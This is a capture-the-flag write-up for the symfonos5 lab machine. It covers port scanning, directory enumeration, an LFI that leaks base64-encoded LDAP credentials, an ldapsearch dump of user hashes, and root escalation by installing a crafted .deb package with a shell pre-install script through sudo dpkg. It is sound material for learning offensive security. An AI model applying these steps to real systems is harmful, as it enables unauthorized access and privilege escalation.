symfonos5

Namp

22/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 16:70:13:77:22:f9:68:78:40:0d:21:76:c1:50:54:23 (RSA)
|   256 a8:06:23:d0:93:18:7d:7a:6b:05:77:8d:8b:c9:ec:02 (ECDSA)
|_  256 52:c0:83:18:f4:c7:38:65:5a:ce:97:66:f3:75:68:4c (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
389/tcp open  ldap     OpenLDAP 2.2.X - 2.3.X
636/tcp open  ldapssl?

Enumeration

Port 80 Enumeration

gobuster dir -u http://10.0.2.52/ -w /usr/share/dirb/wordlists/big.txt -s 200,301,302 -x html,txt,php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.0.2.52/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,txt,php
[+] Timeout:                 10s
===============================================================
2021/04/17 08:23:05 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.html       (Status: 403) [Size: 274]
/.htaccess            (Status: 403) [Size: 274]
/.htpasswd            (Status: 403) [Size: 274]
/.htaccess.txt        (Status: 403) [Size: 274]
/.htpasswd.html       (Status: 403) [Size: 274]
/.htaccess.php        (Status: 403) [Size: 274]
/.htpasswd.txt        (Status: 403) [Size: 274]
/.htpasswd.php        (Status: 403) [Size: 274]
/admin.php            (Status: 200) [Size: 1650]
/home.php             (Status: 302) [Size: 0] [--> admin.php]
/index.html           (Status: 200) [Size: 207]              
/logout.php           (Status: 302) [Size: 0] [--> admin.php]
/portraits.php        (Status: 200) [Size: 165]              
/server-status        (Status: 403) [Size: 274]              
/static               (Status: 301) [Size: 307] [--> http://10.0.2.52/static/]
                                                                              
===============================================================
2021/04/17 08:23:15 Finished
===============================================================

/admin.php /home.php dir are intresting

/admin directory not vulnerble to sqli

when we try to access /home.php directory to redirect to /admin.php

fire brupsuite , checked the source Code , /home.php include url from server local host , here this leverage to LFI

/var/www/html/admin.php has the ldap creds init encoded with base64

 echo "Y2V0a0tmNHdDdUhDOUZFVA==" | base64 -d

LDAP Enumeration

ldapsearch -h 10.0.2.52 -p 389 -b “dc=symfonos,dc=local” -w ‘qMDdyZh3cT6eeAWD’ -D “cn=admin,dc=symfonos,dc=local”

┌──(root💀nucleus)-[~]
└─# ldapsearch -h 10.0.2.52 -p 389 -b "dc=symfonos,dc=local" -w 'qMDdyZh3cT6eeAWD' -D "cn=admin,dc=symfonos,dc=local"
# extended LDIF
#
# LDAPv3
# base <dc=symfonos,dc=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# symfonos.local
dn: dc=symfonos,dc=local
objectClass: top
objectClass: dcObject
objectClass: organization
o: symfonos
dc: symfonos

# admin, symfonos.local
dn: cn=admin,dc=symfonos,dc=local
objectClass: simpleSecurityObject
objectClass: organizationalRole
cn: admin
description: LDAP administrator
userPassword:: e1NTSEF9VVdZeHZ1aEEwYldzamZyMmJodHhRYmFwcjllU2dLVm0=

# zeus, symfonos.local
dn: uid=zeus,dc=symfonos,dc=local
uid: zeus
cn: zeus
sn: 3
objectClass: top
objectClass: posixAccount
objectClass: inetOrgPerson
loginShell: /bin/bash
homeDirectory: /home/zeus
uidNumber: 14583102
gidNumber: 14564100
userPassword:: Y2V0a0tmNHdDdUhDOUZFVA==
mail: zeus@symfonos.local
gecos: Zeus User

# search result
search: 2
result: 0 Success

# numResponses: 4
# numEntries: 3

from above Enumeration we got Username and password

zeus:Y2V0a0tmNHdDdUhDOUZFVA==

PrivilageEsclation

dpkg linux package SUID can be run as root without passwd

so first we need to create the .db package which contains the bash shell so that when it is extracted it spawn the Bashshell

fpm
fpm is used to create the .db pacakge

fpm -s dir -t deb -n exploit –before-install shell.sh .

zeus@symfonos5:/tmp$ sudo -u root /usr/bin/dpkg -i exploit_1.0_amd64.deb
Selecting previously unselected package exploit.
(Reading database ... 53057 files and directories currently installed.)
Preparing to unpack exploit_1.0_amd64.deb ...
root@symfonos5:/# cd /root
root@symfonos5:~# ls
proof.txt
root@symfonos5:~# cat proof.txt 
 
                    Congrats on rooting symfonos:5!
  
                                   ZEUS
              *      .            dZZZZZ,       .          *
                                 dZZZZ  ZZ,
     *         .         ,AZZZZZZZZZZZ  `ZZ,_          *
                    ,ZZZZZZV'      ZZZZ   `Z,`\
                  ,ZZZ    ZZ   .    ZZZZ   `V
        *      ZZZZV'     ZZ         ZZZZ    \_              .
.              V   l   .   ZZ        ZZZZZZ          .
               l    \       ZZ,     ZZZ  ZZZZZZ,
   .          /            ZZ l    ZZZ    ZZZ `Z,
                          ZZ  l   ZZZ     Z Z, `Z,            *
                .        ZZ      ZZZ      Z  Z, `l
                         Z        ZZ      V  `Z   \
                         V        ZZC     l   V
           Z             l        V ZR        l      .
            \             \       l  ZA
                            \         C          C
                                  \   K   /    /             K
                          A    \   \  |  /  /              /
                           \        \\|/ /  /
   __________________________________\|/_________________________
            Contact me via Twitter @zayotic to give feedback!